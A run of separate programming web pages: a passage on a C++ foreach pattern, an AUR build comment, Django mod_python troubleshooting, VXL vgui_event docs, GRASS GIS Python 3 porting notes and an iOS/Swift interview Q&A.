Here, attributes like name and phone are stored within the Customers class and set to the values of the current record in both first() and next(). Here, the container holds the object attributes and is the object itself.

Alternatively, you can derive Customers (note the ending 's', therefore a set of customers) from the Customer (single object) class, isolating the object and iterating concerns. Then, exactly the same code is usable (here the container is derived from the object). Once again, the usage does not tell the user anything about the underlying design aspects; they are not exposed.

Note: In the examples given much earlier, the container and the objects are separate, hence copy operations may be invoked on the objects when referred to using current(). Under such conditions, following the regular C++ guidelines, don't forget to define the copy constructor and the copy operator if the class contains anything but PODs. But this is common C++ programming, nothing specific about this implementation of foreach.

Also, this foreach does not take two parameters as in foreach(i in iset), which would require the compiler to know about the container. So if and when the standard adds such a thing, you can easily distinguish between the two.

I had second thoughts about publishing this technique, as it is particularly obvious and simple, once shown. For a long time, I had the impression that others must have stumbled on such a trivial solution earlier. Discussions in a newsgroup indicated otherwise. If nothing else, please treat this as a simple pattern that I found stable and have used in my code. I would compare this with #define dim(x) (sizeof(x)/sizeof(x[0])), which has saved me many chagrins - just define and use brainlessly. You can certainly code without it, and enjoy the debugging fun.
A comment about the target level: this article should be useful for beginners and advanced users, as beginners will readily see the simple 'user' code; advanced users will understand the impact of seemingly simple solutions. The intermediates will most likely have too much code written to even think about changing anything! Beginners, please don't ask me the following:

The example given is just that, an example. I do not endorse OpenRJ or derivatives. When I complained that the library and the usage examples could be simpler, the author wanted clarifications. My sample code had this foreach. It was revealed during further discussions that foreach could be useful to others. I wrote the test program first, then the alternate library implementations. The original library can be found at: Open-RJ (redirects to SourceForge). Thanks to Matthew Wilson for pointing me in the right direction!

Much more involved discussions have been done about 'foreach' in C++. Most of these have complex implementation suggestions. Some of the discussions are at:

26th May, 2005: The technique is simple, and quite stable. Any suggestions for improvement?
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

Container:
typedef value_type;
typedef iterator;
typedef const_iterator;
typedef reference;
typedef const_reference;
typedef pointer;
typedef difference_type;
typedef size_type;

begin()
end()
size()
max_size()
empty()
swap(b)
swap(a,b)

Copy Constructor
Destructor

operator=
operator==
operator!=
operator<
operator>
operator<=
operator>=

Iterators:
operator++
operator*
operator->
operator==
operator!=

Default Constructor

Mutable Iterators: (No need for mutable iterators unless you want them...)
operator* (Returns reference to mutable value)
https://www.codeproject.com/Articles/10488/Implementing-foreach-for-C-as-a-Design-Pattern?PageFlow=Fluid
a36233: Install qt4 (uninstall qt5 if necessary). It is required to symlink qmake -> qmake-qt4. Then, the following error occurs: "SSLv3_client_method not declared in this scope". To solve this issue I replaced the respective function call argument with NULL (I know it's not a good idea). It compiles successfully.

Package Details: cartao-cidadao-svn 1.0-0

Latest Comments

agrr commented on 2016-03-30 16:20

0xACB commented on 2016-03-18 16:51
https://aur-dev.archlinux.org/packages/cartao-cidadao-svn/
Setting Up mod_python

This is dealt with more in the installation area here:.

Troubleshooting mod_python

MD5 Issues

It has been reported that mod_python has trouble returning good MD5 strings. It has been speculated that this is because many Apache mods are using the same md5 source (php and so forth), but this is not confirmed. It is likely working in most versions of mod_python, but some have had trouble with it. A workaround is to use SHA strings instead of MD5. A ticket has been submitted (ticket:2249) that would allow one to specify SHA or MD5 session keys to avoid this problem in the future, but as of now, you have to manually update django to make this work.

Note: This problem is more likely because of Debian mucking up their Python installation. See section 'Python MD5 Hash Module Conflict' of '' on the mod_wsgi site.

How to do the update

- Find your django install; it should live inside the site-packages directory of python. On debian this is /usr/lib/python#.#/site-packages. The #'s are your version number. Other OS's may stick python in different places.
- You are going to be modifying django/contrib/sessions/models.py and django/contrib/admin/views/decorators.py. Make backups of those two files.
- Find the line at the top of the scripts that imports md5. Add sha so that the line looks something like this:

import base64, md5, sha  # there may be a bunch more stuff after this

- Next, replace all instances of "md5" with "sha" throughout the documents. A search and replace is fine.
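If you prefer the command line, the global replacement can be sketched with sed. This is demonstrated on a throwaway file here; in a real install you would run the same command over the two django files listed above, keeping the .bak backups:

```shell
# Demo of the md5 -> sha replacement on a throwaway file; the real targets
# would be django/contrib/sessions/models.py and
# django/contrib/admin/views/decorators.py.
printf 'import base64, md5, sha\npickled_md5 = md5.new(data).hexdigest()\n' > demo.py

# Replace every occurrence of md5 with sha, keeping a .bak backup.
sed -i.bak 's/md5/sha/g' demo.py

cat demo.py
# -> import base64, sha, sha
# -> pickled_sha = sha.new(data).hexdigest()
```

Note that if you already added sha to the import line, the replacement leaves it naming sha twice; that is legal Python, though you may want to tidy it by hand.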
# For example, the following two lines, which originally looked like this:
pickled_md5 = md5.new(pickled + settings.SECRET_KEY).hexdigest()
return base64.encodestring(pickled + pickled_md5)

# would now look like this:
pickled_sha = sha.new(pickled + settings.SECRET_KEY).hexdigest()
return base64.encodestring(pickled + pickled_sha)

- SHA strings are 40 characters, not 32, so we need to fix the string splitting:

# Find the lines that look like this:
pickled, tamper_check = encoded_data[:-32], encoded_data[-32:]

# And change them to this:
pickled, tamper_check = encoded_data[:-40], encoded_data[-40:]

- Done. That's all there is to it. Restart Apache after saving the files and try to go to your admin area. If you have any additional problems, please head over to the irc channel.

Plesk Issues: Django not being called by Apache on a subdomain

Symptom

Loading the page in a browser shows nothing but the contents of your httpdocs directory (i.e. no output from your django project appears).

Probable cause

Apache is not reading your vhost.conf file containing the django handler.

Solution

On a Plesk-administered system, the conf settings for django to work on a subdomain need to be entered into the vhost.conf file, often located at something like /var/www/vhosts/<yourdomain>/subdomains/<subdomain>/conf/vhost.conf

Open the file and edit it to invoke the django python handler, as described in the Installing Django documentation.

VERY IMPORTANT: Once you are done creating the file, you *must* go back to Plesk, open your subdomain settings page, and resave the settings. Until you do this, Apache will not load your vhost.conf file.
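As a sketch, the mod_python handler block placed in vhost.conf might look like the following; mysite.settings is a placeholder for your own settings module, so check the Installing Django documentation for the authoritative version:

```apache
<Location "/">
    SetHandler python-program
    PythonHandler django.core.handlers.modpython
    SetEnv DJANGO_SETTINGS_MODULE mysite.settings
    PythonDebug Off
</Location>
```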
http://code.djangoproject.com/wiki/ModPython
The vgui_event class encapsulates the events handled by the vgui system. More...

#include <vgui_event.h>

The vgui_event class encapsulates the events handled by the vgui system.

For key presses with modifiers the following standards apply:

  a        modifier = vgui_NULL    key = 'a'    ascii_char = 'a'
  CTRL+a   modifier = vgui_CTRL    key = 'a'    ascii_char = '^A'
  SHIFT+a  modifier = vgui_SHIFT   key = 'a'    ascii_char = 'A'

We have decided to make it a standard that key is always lower case, for simplicity. In particular, people have been defining impossible vgui_event_conditions, e.g. key='A', modifier=NULL (where NULL is the default modifier), and then wondering why SHIFT+a doesn't work. A new data type has been added (ascii_char) which holds the actual key stroke pressed by the user.

Definition at line 80 of file vgui_event.h.

Constructor - create a default event.
Definition at line 84 of file vgui_event.h.

Constructor - create an event of the given type.
Definition at line 49 of file vgui_event.cxx.

Initialise default event.
Definition at line 22 of file vgui_event.cxx.

Definition at line 73 of file vgui_event.cxx.

Definition at line 79 of file vgui_event.cxx.

Convert the given key to lower case and use that to set the key. I added this to avoid the complication of doing this conversion in each GUI impl - kym.
Definition at line 59 of file vgui_event.cxx.

Definition at line 85 of file vgui_event.cxx.

The actual key stroke pressed by the user.
Definition at line 105 of file vgui_event.h.

Mouse button used (if it is a mouse event).
Definition at line 93 of file vgui_event.h.

Definition at line 136 of file vgui_event.h.

The key pressed in lower case (if it is a key event).
Definition at line 96 of file vgui_event.h.

Which modifiers are pressed during the event (NULL, CTRL, SHIFT).
Definition at line 102 of file vgui_event.h.

The adaptor from which the event came.
Definition at line 114 of file vgui_event.h.
A vcl_string message, for an event of type vgui_STRING.

An event of type vgui_STRING implies that this field contains some sort of textual message. The exact encoding of these messages is unspecified; the sender and the receiver may use any protocol they like. Caveat: as a corollary, there is no guarantee that one protocol will not clash with another.
Definition at line 128 of file vgui_event.h.

If the event is a timer event, this holds the ID.

For an event of type vgui_TIMER, this field holds the name that was given when the timer request was posted.
Definition at line 119 of file vgui_event.h.

Timestamp in milliseconds since app started.
Definition at line 111 of file vgui_event.h.

The type of event (key press, mouse motion, etc).
Definition at line 90 of file vgui_event.h.

Type and data for events of type vgui_OTHER.

The fields user and data are used only when the event type is vgui_OTHER. The 'user' field must uniquely identify the type of event, in the sense that once the user field is known, the 'data' field can be safely cast to point to the client data (type).
Definition at line 135 of file vgui_event.h.

Position of the mouse pointer in viewport coordinates when event occurred.
Definition at line 108 of file vgui_event.h.
http://public.kitware.com/vxl/doc/release/core/vgui/html/classvgui__event.html
Table of Contents

Python 3 support in GRASS

Python versions

- keep compatibility with 2.7 (may still work with 2.6, but we don't care)
- port to work with 3.5

Python components include:

- Python Scripting Library
- PyGRASS
- Temporal Library
- ctypes
- wxGUI

Python Scripting Library

What to consider:

- The API is used not only by the GRASS Development Team (core devs) but in general, e.g. by people writing addons or custom user scripts.
- Maybe the core devs can be convinced to follow certain special practices for the core modules, but it doesn't seem realistic that addon contributors will follow them if they are too distant from what is standard for the language (a less serious example is requiring PEP8 conventions versus some custom ones).
- The purpose of the API is to make it simple for people to use and extend GRASS GIS.
- Trained (and even the non-trained) Python 3 programmers will expect the API to behave in the same way as the standard library and the language in general.
- One writes os.environ['PATH'], not os.environ[b'PATH'] nor os.environ[u'PATH'].
- GUI needs Unicode at the end.

Possible approach:

- functions need to accept unicode and return unicode
- functions wrapping the Python Popen class (read_command, run_command, ...) will have a parameter encoding
- encoding=None means the function expects and returns bytes (the current state)
- encoding='default' means it takes the current encoding using utils._get_encoding()
- encoding='utf-8' takes whatever encoding the user specifies, e.g. utf-8 in this case
- this is similar to the Popen class in Python 3.6
- by default encoding='default', to enable the behavior users expect; the following example shows the Python 3 behavior if we keep using bytes instead of unicode:

# return bytes
ret = read_command('r.what', encoding=None, ...
for item in ret.splitlines():
    line = item.split('|')[3:]
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: a bytes-like object is required, not 'str'

# we would have to use:
for item in ret.splitlines():
    line = item.split(b'|')[3:]

Unicode as the default type in the API, e.g. for keys, but also for many values, is supported by Unicode being the default string literal type in Python 3. API users will expect that expressions such as the hypothetical computation_region['north'] will work. Unlike in Python 2, there is a difference in Python 3 between computation_region[u'north'] and computation_region[b'north']. See this comparison of dictionary behavior in 2 and 3:

# Python 2
>>> d = {'a': 1, b'b': 2}
>>> d['b']
2
>>> d[u'b']
2
>>> # i.e. no difference between u'' and b'' keys
>>> # and that applies for creating also:
>>> d = {u'a': 1, b'a': 2}
>>> d['a']
2
>>> # because
>>> d
{u'a': 2}

# Python 3
>>> # unlike in 2, we get now two entries:
>>> d = {'a': 1, b'a': 2}
>>> d
{b'a': 2, 'a': 1}
>>> d['a']
1
>>> d[b'a']
2
>>> # it becomes a little confusing when we combine unicode and byte keys
>>> d = {'a': 1, b'b': 2}
>>> d['a']
1
>>> d['b']
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
KeyError: 'b'
>>> d[b'b']
2
>>> # in other words, the user needs to know and specify the key as bytes

Python 2 and Python 3 differences

The most important change between these two versions is dealing with strings.

- In Python 2:
  - Bytes == Strings
  - Unicodes != Strings
- In Python 3:
  - Bytes != Strings
  - Unicodes == Strings

When special characters are involved: in Python 3, bytes objects cannot contain character literals other than ASCII, therefore we use bytes() to convert from a unicode/string to a bytes object.
>>> bytes('Příšerný kůň', encoding='utf-8')
b'P\xc5\x99\xc3\xad\xc5\xa1ern\xc3\xbd k\xc5\xaf\xc5\x88'

To decode, use decode():

>>> b'P\xc5\x99\xc3\xad\xc5\xa1ern\xc3\xbd k\xc5\xaf\xc5\x88'.decode()
'Příšerný kůň'

We already have encode and decode functions available in lib/python/script/utils.py (from grass.script.utils import encode, decode) that make it easy for us to convert back and forth. To make them work with Python 3, changes were made in those functions to avoid syntax errors and exceptions.

Dictionary Differences

How to write Python 3 compatible code

To check which Python version is being used, use sys.version_info like:

import sys

if sys.version_info.major >= 3:
    # Python 3 code path
    ...
else:
    # Python 2 code path
    ...

Other recommendations: use the .format specifier for strings and parameters. For example, instead of using:

'%s %s' % ('one', 'two')

use:

'{} {}'.format('one', 'two')

.format is compatible with both Python 2 and Python 3. Read more at:

wxPython GUI

There are a lot of changes in the wxPython Phoenix version. It is recommended to follow the Migration guide () to properly migrate from the Classic version of wxPython and to support both versions. The wrap.py module includes a lot of new classes that act as wrappers to accommodate both versions of wxPython and of Python itself. All the changes for Classic vs Phoenix can be found here:

We have created a wrap.py module that contains overloaded classes for wx classes to support both versions. Example:

from gui_core.wrap import TextCtrl, StaticText

Deprecation warnings can be removed by appropriately using the wx classes. Refer to the changes in both versions and check whether a wrapper class has already been created for the wx class; if not, create a new class in a similar manner to the other wrapper classes in the wrap.py file.

The cmp function is not available in Python 3; a custom version has been created and included in the gui/wxpython/core/utils.py file. Be sure to include it wherever cmp() is used.
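A minimal sketch of such a cmp replacement follows; the real helper lives in gui/wxpython/core/utils.py, and this version just shows the idea:

```python
def cmp(a, b):
    """Python 2 style three-way comparison.

    Returns a negative number if a < b, zero if a == b, and a positive
    number if a > b.  The boolean subtraction maps the two comparisons
    onto -1, 0, or 1 without branching.
    """
    return (a > b) - (a < b)


print(cmp(1, 2))    # -1
print(cmp(2, 2))    # 0
print(cmp("b", "a"))  # 1
```

Because it only relies on the < and > operators, it works for any types that are mutually comparable in Python 3.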
How to test This section explains how to compile GRASS GIS (trunk) with Python3 support and how to run it. Linux We can rather easily create an isolated environment with Python3 using virtualenv which lets you test GRASS GIS with Python3 support while not cluttering your standard system. Installation of virtualenv-3: # on Fedora sudo dnf install python3-virtualenv # on Debian/Ubuntu sudo apt install python3-virtualenv Preparation of the virtual Python3 environment. There are two options, build wx package on your own (it takes time like 30+min and some GB to build!) or simply use system-wide packages: # USE DISTRO PROVIDED PACKAGES # 3a) on Fedora sudo dnf install python3-six python3-numpy python3-wxpython4 # 3a) on Debian/Ubuntu system sudo apt install python3-six python3-numpy python3-wx # OR BUILD WX PACKAGE DEPENDENCIES # 3b) on Fedora (not recommended) # sudo dnf install python3-six gtk3-devel gstreamer-devel gstreamer-plugins-base-devel python3-sip python3-sip-devel webkit2gtk3-devel # 3b) on Debian/Ubuntu (untested) sudo apt install libgtk-3-dev libgstreamer-plugins-base0.10-dev Create the virtual environment: # FOR CURRENT USER ONLY # 4a) on Fedora virtualenv-3 -p python3 grasspy3 # 4a) on Debian/Ubuntu virtualenv -p python3 grasspy3 # OR AS SYSTEM-SIDE VIRTUALENV # 4b) on Fedora virtualenv-3 -p python3 grasspy3 --system-site-packages # 4b) on Debian/Ubuntu virtualenv -p python3 grasspy3 --system-site-packages Activating the virtual Python3 environment for testing: # activate it (this will change the terminal prompt so that you know where you are...) source grasspy3/bin/activate and build within this environment 'wx' package (NOTE: only needed if 3b) above was used!) # run within virtualenv # install required Python3 packages for GRASS GIS (it takes time like 30min and some GB to build! 
not recommended)
pip install six
pip install wxpython
pip install numpy
# if desired, also GDAL (not recommended)
pip install --global-option=build_ext --global-option="-I/usr/include/gdal" GDAL==`gdal-config --version`

We are now set with the dependencies. Compile GRASS GIS with Python 3:

# cd where/the/source/is/
configure...
make
make install

Test GRASS GIS with Python 3:

# just run it in the virtualenv session
grass77 --gui

In order to deactivate the virtualenv environment, run:

deactivate

Windows

To test a winGRASS compilation with Python 3 support, install the dependencies according to the Windows native compilation guidelines.

In the MSYS2/mingw environment:

cd /usr/src
virtualenv --system-site-packages --no-pip --no-wheel --no-setuptools grasspy3
Using base prefix 'C:/msys64/mingw64'
New python executable in C:/msys64/usr/src/grasspy3/Scripts/python3.exe
Also creating executable in C:/msys64/usr/src/grasspy3/Scripts/python.exe

Change into the grasspy3 directory and do an svn checkout:

cd grasspy3
svn checkout grass_trunk

Activate the virtual environment:

$ source Scripts/activate
(grasspy3)

Change into the grass_trunk directory and start the compilation:

cd grass_trunk
# for daily builds on 64bit
PACKAGE_POSTFIX=-daily OSGEO4W_POSTFIX=64 ./mswindows/osgeo4w/package.sh

Troubleshooting

Problem:

File "/<grassbin_path>/etc/python/grass/lib/vector.py", line 5860
    PORT_LONG_MAX = 2147483647L
                             ^
SyntaxError: invalid syntax

Solution: make sure to compile GRASS GIS with Python 3 (the error occurs when GRASS GIS was compiled with Python 2 and then opened with Python 3).

References
http://trac.osgeo.org/grass/wiki/Python3Support
About the Latest Trend

Latest versions of iOS, Swift and Xcode

Answer: As of today (22-March-2020), the latest versions are:
Xcode: 11.3
Swift: 5.2
iOS: 13.1
macOS: Catalina 10.15

1. What's new in Swift 5?

Answer:

1. isMultiple(of:)

var row = 20
if row % 2 == 0 {
    print("Even number")
}
// in Swift 5
if row.isMultiple(of: 2) {
    print("Even number")
}

2. Creation of raw strings

As of Swift 5, it is possible to create raw strings. This makes it possible to express string literals as they are. Raw strings are created using the # before and after the String value.

var myName = #"Hello! My Name is "Sandesh Sardar" "#

2. What is new in the iOS version, and what's new in it compared to the previous version?

Answer: Two big new features of iOS 13 are Dark Mode (previously it applied only to system apps, but now it can be integrated into third-party apps) and Sign In with Apple (just like Facebook and Google sign-in).

Diffable data source – no need to write the data source methods for a table view or collection view by hand.

iOS Coding Concepts

1. What is an array? How is it created, and what are the different operations on it?

Answer: An array is an ordered collection that stores multiple values of the same type. That means that an array of Int can only store Int values, and you can only insert Int values into it.

// how to create
var names = ["Arthur", "Ford", "Trillian", "Zaphod", "Marvin"]

// empty array
let score = [Int]()

// how to add an element to an array
names.append("Eddie")
names += ["Heart of Gold"]

// how to remove
names.remove(at: 2)

// how to insert at a particular position
names.insert("Humma Kavula", at: 4)

3. What is a Dictionary? How is it created, and what are the different operations on it?

Answer: A dictionary is an unordered collection that stores multiple values of the same type. Each value in the dictionary is associated with a unique key. All the keys have the same type.
// how to declare
var stringsAsInts: [String: Int] = [
    "one": 1,
    "two": 2,
    "three": 3
]

var emptyDictionary: [Int: Int] = [:]

stringsAsInts["one"] // Optional(1) — getting a value

// how to loop
for (key, value) in stringsAsInts {
    print("\(key): \(value)")
}

stringsAsInts["three"] = 3 // update via subscript
stringsAsInts.updateValue(3, forKey: "three") // you can also use updateValue(_:forKey:) to update
stringsAsInts.removeValue(forKey: "three") // removeValue(forKey:)

4. What is a set?

Answer: A set is an unordered collection of distinct values of the same type; duplicates are discarded. Declaring a set with duplicate values:

let someStrSet: Set = ["ab", "bc", "cd", "de", "ab"]
print(someStrSet)

When you run the program, the output will be (order may vary):

["de", "ab", "cd", "bc"]

5. What is the first thing called when an iOS application starts?

Answer: The main function in the main.m file. But for practical purposes you usually need to implement some of the UIApplicationDelegate's methods, depending on the situation. If the app starts up, it's:

- (BOOL)application:(UIApplication *)application willFinishLaunchingWithOptions:

If a view starts up, then it's:

- (void)viewDidLoad {}

6. What is the difference between var and let?

Answer: var is a variable that can be changed (mutable), while let denotes a constant that cannot be changed once set (immutable).

7. What is the difference between implicit and explicit?

Answer: When referring to something as implicit or explicit, it is often referring to how an object is declared. In the two examples below:

var name: String = "onthecodepath" // explicit
var name = "onthecodepath" // implicit

(Swift is able to infer that name is of String type since the value that it is being set to is of String type.)

8. What is the question mark (optional) ? in Swift?

Answer: The question mark marks a type as optional, meaning the variable may either contain a value or be nil. An optional must be unwrapped before its value can be used.

9. What are the types of optional unwrapping in Swift?

Answer:
1. Optional binding
2. Force unwrapping
3. guard (early exit)

10. What is optional binding in Swift?

Answer: Use optional binding to find out whether an optional contains a value, and if so, to make that value available as a temporary constant or variable.
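Optional binding works with both if and guard. A minimal guard-based sketch (the greeting function and its messages are hypothetical examples, not from the original text):

```swift
// Optional binding with guard: exits early when the optional is nil.
func greeting(for name: String?) -> String {
    guard let unwrapped = name else {
        return "Hello, stranger"
    }
    // unwrapped is a plain String from here on
    return "Hello, \(unwrapped)"
}

print(greeting(for: "Swift")) // Hello, Swift
print(greeting(for: nil))     // Hello, stranger
```

Note how guard keeps the unwrapped value available for the rest of the scope, rather than only inside a braces block as with if let.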
An optional binding for the if statement is as follows:

var myString: String?
myString = "Hello, Swift 4!"
if let yourString = myString {
    print("Your string has - \(yourString)")
} else {
    print("Your string does not have a value")
}

When we run the above program in a playground, we get the following result:

Your string has - Hello, Swift 4!

11. What is force unwrapping in Swift?

Answer: This is used where we are sure an optional has a value. If for some reason we force unwrap an optional that does not, in fact, have a value, then this will result in a program crash.

12. What is an implicit optional?

Answer: Sometimes we do not provide an initial value for a variable, but it is clear from the program's structure that the variable will have a value. In this case, there is no need to make the variable a regular optional. Instead we make it an implicitly unwrapped optional. Implicit optionals are in fact optionals behind the scenes, but when they get a value it is unwrapped automatically and the variable does not need to be treated as an optional. If no value exists when we attempt to access an implicit optional, this will result in a program crash.

var myName: String!
myName = "Sandesh"
let fullName = myName + " Sardar"
print(fullName)

13. What is the use of the exclamation mark !?

Answer: Highly related to the previous keywords, the ! is used to tell the compiler that I know for certain that this variable/constant contains a value, so please use it (i.e. please unwrap the optional).

14. Optional chaining

Answer: The process of querying and calling properties, subscripts and methods on an optional that may be nil is defined as optional chaining.
Optional chaining returns two kinds of values:

- If the optional contains a value, then calling its related properties, methods and subscripts returns values.
- If the optional contains a nil value, all its related properties, methods and subscripts return nil.

Since multiple queries to methods, properties and subscripts are grouped together, a failure in one link affects the entire chain and results in a nil value.

Program for optional chaining with '!':

class ElectionPoll {
    var candidate: Pollbooth?
}
class Pollbooth {
    var name = "MP"
}
let cand = ElectionPoll()
let candname = cand.candidate!.name

When we run the above program in a playground, we get the following result:

fatal error: unexpectedly found nil while unwrapping an Optional value

Program for optional chaining with '?':

class ElectionPoll {
    var candidate: Pollbooth?
}
class Pollbooth {
    var name = "MP"
}
let cand = ElectionPoll()
if let candname = cand.candidate?.name {
    print("Candidate name is \(candname)")
} else {
    print("Candidate name cannot be retrieved")
}

When we run the above program in a playground, we get the following result:

Candidate name cannot be retrieved

15. How do you store data locally?

Answer:
- SQLite
- Property List
- Core Data
- NSUserDefaults
- Keychain

SQLite for iOS local data storage: SQLite is a powerful, lightweight C library that is embedded in an iOS application. It is used in various applications across various platforms, including Android and iOS. It uses a SQL-centric API to operate on the data tables directly.

Property List: Documents in a property list contain either an NSDictionary or an NSArray, inside which there is archived data. There are a number of classes that can be archived into a plist, e.g. NSArray, NSDate, NSString, NSDictionary. Objects other than these cannot be archived as a property list, and the file will not be written.
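In Swift, writing and reading such a property list can be sketched with Foundation's PropertyListEncoder and PropertyListDecoder (the Settings struct here is a hypothetical example type, not from the original text):

```swift
import Foundation

// Hypothetical Codable type containing only plist-representable values.
struct Settings: Codable, Equatable {
    var username: String
    var launchCount: Int
}

let original = Settings(username: "sandesh", launchCount: 3)

// Encode to plist data (XML format) and decode it back.
let encoder = PropertyListEncoder()
encoder.outputFormat = .xml
let data = try! encoder.encode(original)
let decoded = try! PropertyListDecoder().decode(Settings.self, from: data)
print(decoded == original) // true
```

The resulting data could be written to a file in the app's Documents directory; attempting to encode a non-plist type would throw instead.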
The user has to be very particular about the classes of listed items; for instance, to store a Boolean or Integer value, only the NSNumber class is used. Plain Boolean or Integer values must not be given to an NSDictionary or NSArray.

Core Data: By default, Core Data uses SQLite as its main database in an iOS app. Internally, Core Data makes use of SQLite queries to save and store its data locally, which is why the files are stored as .db files. This also eliminates the need to install a separate database. Core Data lets you handle common functionalities of an app such as store, restore, undo and redo. Core Data is a data-modelling framework built on the model-view-controller (MVC) pattern. It is expressed in terms of entities and relationships; we can create entities and add relationships in graphical form.

NSUserDefaults: To save properties and user preferences in an application, NSUserDefaults is one of the most common methods of local data storage. For example, it is used to save the logged-in state of the user within an application, so that the app can fetch this data even when the user opens the application at some other time. In some iOS apps this method is used to save confidential user information like access tokens. NSUserDefaults is meant to store small amounts of data; it can slow the app down if large data is stored. Also, UserDefaults is not encrypted.

Keychain: It can be used to save passwords, secure notes, certificates, etc. In general, the Keychain is an encrypted database with a quite complicated and robust API. It is used to reduce the vulnerabilities of iOS applications by storing local data in a secure manner. If the device is jailbroken, none of your data is secure. On a non-jailbroken device, this is the most secure and reliable method to store data. Simple wrapper classes are used to store data using the Keychain.
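For comparison, the basic NSUserDefaults save-and-read pattern in Swift can be sketched like this (the key names and stored values are hypothetical examples):

```swift
import Foundation

let defaults = UserDefaults.standard

// Save small preference values under string keys (key names hypothetical).
defaults.set(true, forKey: "isLoggedIn")
defaults.set("Sandesh", forKey: "username")

// Read the values back later, even on a subsequent launch.
let loggedIn = defaults.bool(forKey: "isLoggedIn")
let username = defaults.string(forKey: "username") ?? "unknown"
print(loggedIn, username) // true Sandesh
```

Remember the caveats above: this store is unencrypted and intended only for small, non-sensitive values.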
The code for saving data is similar to the code for saving data in NSUserDefaults, and the syntax used is very similar to that of NSUserDefaults. However, on a jailbroken device data storage using the Keychain is no longer safe, since the attacker can access everything, from plist files to the Keychain and other method implementations.

Saving files to disk: Apple makes writing, reading and editing files inside iOS applications very easy. Every application has a sandbox directory (called the Documents directory) where you can store your files. A FileManager object provides all these functionalities with very simple APIs.

Difference between SQLite and Core Data?

Core Data:
- Not a database; it is a framework for managing an object graph (a collection of interconnected objects).
- It uses SQLite for its persistent store.
- The framework excels at managing complex object graphs and their life cycles.
- Core Data is an ORM (Object-Relational Mapping) which creates a layer between the database and the UI.

SQLite:
- Relational database.
- Lightweight DB, stored on disk.
- SQLite does not require a separate server process or system to operate.

16. What are delegate and data source?

Answer: A delegate is an object that acts on behalf of, or in coordination with, another object when that object encounters an event in a program. The delegating object typically keeps a reference to the other object (the delegate) and sends a message to it at the appropriate time. It is important to note that they have a one-to-one relationship.

A data source is like a delegate except that, instead of being delegated control of the user interface, it is delegated control of data.

TableView delegate and data source methods

Data source: the UITableViewDataSource protocol deals with providing data for the table view.
The required functions that need to be implemented are:
- tableView:cellForRowAtIndexPath:
- tableView:numberOfRowsInSection:

Delegate:
- heightForFooterInSection
- heightForRowAt
- viewForFooterInSection

CollectionView delegate and data source methods

Data source:
- numberOfItemsInSection
- cellForItemAt indexPath: IndexPath

Delegate:
- didSelectItemAt indexPath

A flow layout works with the collection view's delegate object to determine the size of items, headers and footers in each section and grid. That delegate object must conform to the UICollectionViewDelegateFlowLayout protocol. Use of the delegate allows you to adjust layout information dynamically.

17. Struct vs Class in Swift

Answer: Classes and structures are general-purpose, flexible constructs that become the building blocks of your program's code. You define properties and methods to add functionality to your classes and structures using exactly the same syntax as for constants, variables and functions.

Value types: Struct, Enum, String, Array, Dictionary
Reference types: Class, NSString, NSArray

1. When you pass a class object around your program, you are actually passing a reference to that object, so different parts of your program can share and modify your object. When you pass a structure (or enum) around your program, what gets passed around is a copy of the structure, so modifications to structures don't get shared. Inheritance enables one class to inherit the characteristics of another; a struct or enum cannot use inheritance, but they can conform to protocols (inheritance is not allowed in a struct, but adopting protocols is allowed).
2. The final keyword on a class makes the class final and does not allow any other class to inherit from it.
3. The override keyword is used to override a parent class function in a child class.
4. Inheritance is not available in structs.
5. Classes never come with a memberwise initializer. This means if you have properties in your class, you must always create your own initializer.
6.
Another difference between classes and structs is that classes can have deinitializers – code that gets run when an instance of a class is destroyed.
7. The final difference between classes and structs is the way they deal with constants. If you have a constant struct with a variable property, that property can't be changed, because the struct itself is constant.

18. What is the purpose of the UIWindow object?

Answer: The presentation of one or more views on screen is coordinated by a UIWindow object.

19. What is an app bundle?

Answer: An iOS app bundle contains the app executable file and supporting resource files such as app icons, image files and localized content.

20. How should one handle errors in Swift?

Answer: In Swift, it's possible to declare that a function throws an error. It is, therefore, the caller's responsibility to handle the error or propagate it.

21. What is a guard statement in Swift?

Answer: It basically evaluates a boolean condition and proceeds with program execution if the evaluation is true. A guard statement always has an else clause, and it must exit the code block if it reaches there.

guard let courses = student.courses else { return }

22. What is an enum?

Answer: An enum is a user-defined data type. An enumeration is defined using the enum keyword, and it defines a common type for a group of related values. For example, given that there are seven colors in the rainbow, you could create an enumeration named ColorsOfRainbow and add the seven colors as possible values. Enumerations are useful whenever you find yourself with an if-else ladder.

Enumeration names are written in UpperCamelCase. The enumeration cases are written in lowerCamelCase. This is the best practice.

Enumerations can come with prepopulated values. These are known as raw values, and these should all be of the same type.
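A minimal sketch of raw values (the Direction enum is a hypothetical example): Swift auto-derives any raw values you do not assign.

```swift
// Hypothetical enum: String raw values default to the case name
// unless assigned explicitly.
enum Direction: String {
    case north = "N"
    case south = "S"
    case east        // raw value defaults to "east"
    case west        // raw value defaults to "west"
}

print(Direction.north.rawValue) // N
print(Direction.east.rawValue)  // east

// Creating a case back from a raw value returns an optional,
// since the raw value may not match any case.
print(Direction(rawValue: "S") == .south) // true
print(Direction(rawValue: "X") == nil)    // true
```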
When you define an enumeration with integer or string raw values, you do not need to explicitly assign a raw value for each case, because Swift will do this automatically for you.

Enumerations are usually used with the switch statement. This allows us to match individual enumeration cases. A switch statement must be exhaustive, meaning it should cover every possible case in an enumeration. However, you only need to cover a few enumeration cases if you create a default case in your switch statement.

The keywords break and fallthrough are control flow statements used with switch statements. break causes a switch statement to end its execution immediately and to transfer control to the code after the switch's closing brace (}). fallthrough makes a switch statement fall into the next case.

Continue: A continue statement ends program execution of the current iteration of a loop statement but does not stop execution of the loop statement.

var sum = 0
for i in 0..<5 {
    if i == 4 {
        continue // this ends this iteration of the loop
    }
    sum += i // thus 0, 1, 2 and 3 will be added, but not 4
}

Break: A break statement ends program execution of a loop, an if statement, or a switch statement.

var sum = 0
for i in 0..<5 {
    if i == 2 {
        break // this ends the entire loop
    }
    sum += i // thus only 0 and 1 will be added
}

Fallthrough: A fallthrough statement causes program execution to continue from one case in a switch statement to the next case.

var sum = 0
let i = 3
switch i {
case 1:
    sum += i
case 2:
    sum += i
case 3:
    sum += i
    fallthrough // allows the next case to be executed as well
default:
    sum += i
}
// sum is 6: case 3 runs, then falls through into the default case

Sometimes it is useful to have a value stored with an enumeration case. This is called an associated value, and it can be of any type that you define.

23. What is a static variable?

Answer: Static variables are variables whose values are shared among all instances (objects) of a class.
